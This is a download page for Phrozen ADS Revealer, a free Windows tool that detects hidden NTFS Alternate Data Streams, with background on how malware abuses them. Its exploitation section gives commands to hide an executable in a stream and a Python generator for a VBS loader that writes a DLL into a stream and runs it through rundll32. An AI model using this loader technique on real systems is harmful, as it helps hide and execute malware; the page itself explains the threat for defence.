|
Your download link is at the very bottom of the page... always. |
Processed through Paypal No account required. Donate Bitcoin to this wallet: 1KkUMXvQ2ko3xcJkzitB7WYgoW6m79WFfm Donate Ethereum to this wallet: 0x40E56922F43637224935CDC35e2c96E0392A8505 Donate Litecoin to this wallet: LLYAFEyqjH69gkyCEpRjXNyedRCWrVChfL |
File - Download Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642 | ||||||||
Description | ||||||||
Always scroll to the bottom of the page for the main download link. We don't believe in fake/misleading download buttons and tricks. The link is always in the same place. Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642 Phrozen ADS (Alternate Data Stream) Revealer is a Microsoft Windows program, especially designed to reveal possible malicious ADS files in your file system. Since the Alternate Data Stream functionality is only available for NTFS (New Technology File System), the program is able to scan and detect this kind of files only for this type of file system (Physical Hard Drive/Virtual Hard Drive/Physical Removable Device/Virtual Removable Device). If some ADS Files are detected during the scan you then can decide wether or not you want to keep them or to back them up. You can also have a content preview to detect in one glance if it looks legitemate or not. Phrozen ADS Revealer is the perfect tool to sanitize your NTFS file systems against bloated content or hidden malwares. Another great tool to put in your collection and 100% free. What are Alternate Data Stream Alternate data streams allow more than one data stream to be associated with a filename, using the format "filename:streamname" (e.g., "text.txt:extrastream"). NTFS Streams were introduced in Windows NT 3.1, to enable Services for Macintosh (SFM) to store resource forks. Although current versions of Windows Server no longer include SFM, third-party Apple Filing Protocol (AFP) products (such as GroupLogic's ExtremeZ-IP) still use this feature of the file system. Very small ADS (called Zone.Identifier) are added by Internet Explorer and recently by other browsers to mark files downloaded from external sites as possibly unsafe to run; the local shell would then require user confirmation before opening them.[21] When the user indicates that they no longer want this confirmation dialog, this ADS is deleted. Alternate streams are not listed in Windows Explorer, and their size is not included in the file's size. They are ignored when the file is copied or moved to another file system without ADS support, attached to an e-mail, or uploaded to a website. Thus, using alternate streams for critical data may cause problems. Microsoft provides a tool called Streams to view streams on a selected volume. Starting with Windows PowerShell 3.0, it is possible to manage ADS natively with seven cmdlets: Add-Content, Clear-Content, Get-Content, Get-Item, Out-String, Remove-Item, Set-Content. Malware has used alternate data streams to hide code. As a result, malware scanners and other special tools now check for alternate data streams. The two potential dangers of Alternate Data Stream Malware Vector: Using several techniques some types of malware could hide itself inside the ADS of legitimate files. You would never know about it and not all reputable antivirus programs are able to detect these on your file system. Also ADS can be used to store important information by malware and mask its activities (Storing malicious plugins files/Keylogger Logs/Webcam or Desktop capture, etc.). The infamous PoisonIvy RAT and DarkComet RAT used this technique to hide their plugins on the infected computer. Overload Hard Drives memory: Alternate Data Stream files are not visible via Files Explorer, but physically exists in your Hard Drive. Some types of virus can fill the disk with so much junk that it can make the system almost unusable/unwritable. Using our Software you can easily now get rid of that sort of problems! Playing with Alternate Data Stream You can easily create Alternate Data Stream files using the Microsoft Windows Terminal program. Create an ADS File with some text content echo Hello World > c:\my_target.txt:myads.txt Copy a file to ADS type c:\file2copy.jpg > c:\my_target.txt:myads.jpg Exploiting Alternate Data Stream Description If we read OWASP definition of Alternate Data Stream with an eye to security, we can see that they introduce the possibility to directly run application file from Alternate Data Stream using the following commands: type C:\windows\system32 otepad.exe > c:\windows\system32\calc.exe:notepad.exe start c:\windows\system32\calc.exe:notepad.exe Unfortunately for Hackers but fortunately for your safety since the introduction of Windows 7 you cannot use this technique anymore to run application file directly from Alternate Data Stream. However after few simple tests we found an easy but efficient way to get rid of this restriction by using the well known Rundll32.exe application from Microsoft used to run DLL code directly from command line. Indeed Rundll32.exe doesn't apply this restriction to Alternate Data Stream so an Hacker could compile his Malware as a DLL file and directly run it hiddenly from ADS hosted by the signed and trusted process RunDll32.exe application. Also to demonstrate this trick, we code a little snippet in Python which will encode a DLL file in a Visual Basic array of decimal value (Containing the binary code of the DLL) and generate the Visual Basic Script loader file used to extract this array to destination ADS location the malicious decoded DLL then use the Rundll32 process to execute our chosen exported function and voila. The demonstration in Video The DLL example code (Delphi) ------------------------------------------------------------------------------------- library malicious; uses Windows, Sysutils; procedure onemethod(); stdcall; var str : String; begin AllocConsole(); Writeln('Attached to path:' + GetModuleName(0)); Writeln('Attached to PID:' + IntToStr(GetCurrentProcessId)); Writeln(#13#10 + 'Press ENTER to leave!'); readln(str); end; exports onemethod; begin end. --------------------------------------------------------------------------------- The VBS generator code (Python) -------------------------------------------------------------------------------------- # PHROZEN SOFTWARE # CODE EXAMPLE BY Jean-Pierre LESUEUR # jplesueur [@] phrozensoft.com # DESC: Generate a VBS (Visual Basic Script) file containing the possible # malicious DLL file encoded in decimal to be written in a target file ADS # Alternate Data Stream then run it using RunDLL32.exe. import sys import os.path if len(sys.argv) != 6: print("Missing arguments! ") print("Usage: ") print(r"1) The DLL file to be run from ADS (Needs to Exists)") print(r"2) The destination VBS file (Will be created)") print(r"3) The target file that will host the DLL file in ADS (Needs to Exists") print(r"4) The desired ADS name of the DLL file (Choose whatever you wan't") print(r"5) The DLL function to be call from the target DLL written to ADS") exit() FDLLSrc = str(sys.argv[1]) # THE DLL FILE TO BE RUN FROM ADS {NEEDS TO EXISTS} FFileDest = str(sys.argv[2]) # THE DESTINATION VBS FILE {WILL BE CREATED} FHostFile = str(sys.argv[3]) # THE TARGET FILE THAT WILL HOST THE DLL FILE {NEEDS TO EXISTS} FPayloadDestName = str(sys.argv[4]) # THE ADS NAME OF THE DLL FILE {WHATEVER YOU WANT} FDLLExportedFuncName = str(sys.argv[5]) # THE DLL FUNCTION TO BE EXECUTED FROM ADS {MUST BE PRESENT IN DLL EXPORT} if not os.path.exists(FDLLSrc): print("The input DLL file must exists!") exit() if not os.path.exists(FHostFile): print("The host file to run input DLL from ADS must exists!") exit() payload = "payload=array("; with open(FDLLSrc, 'rb') as FDLL: while True: s = FDLL.read(1) if len(s) == 0: break b = ord(s) payload += str(b) + "," payload = payload[:-1] payload += ")" FDLL.close # WRITE THE VBS FILE with open(FFileDest, 'w') as FDest: FDest.write(payload + " ") FDest.write("Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\") ") FDest.write("Set CTF = FSO.CreateTextFile(\"" + FHostFile + ":" + FPayloadDestName + "\") ") FDest.write("for i = 0 to UBound(payload) ") FDest.write("buff = buff&chr(payload(i)) ") FDest.write("next ") FDest.write("CTF.Write buff ") FDest.write("Dim objShell ") FDest.write("Set objShell = WScript.CreateObject(\"WScript.Shell\") ") FDest.write("objShell.Run(\"rundll32 \"\"" + FHostFile + ":" + FPayloadDestName + "\"\" " + FDLLExportedFuncName + "\")") #EOF ---------------------------------------------------------------------- Sha1 : 59398e36a1ef09ae8b78fa8f2dee255eb04d78ce Sha256 : d4db18ee6da2616aaadbba679d79701efde1f9056a98a088524baae56e0f60e1 Click here to visit the author's website. Continue below for the main download link. |
||||||||
Downloads | Views | Developer | Last Update | Version | Size | Type | Rank | |
6,075 | 12,915 | PHROZEN SAS <img src="https://www.oldergeeks.com/downloads/gallery/thumbs/adsrevealer1_th.png"border="0"> | Nov 15, 2019 - 12:00 | 1.0.5642 | 2.42MB | ZIP | , out of 68 Votes. | |
File Tags | ||||||||
Phrozen ADS (Alternate Data Stream) Revealer v1.0.5642 |
Click to Rate File     Share it on Twitter → Tweet
|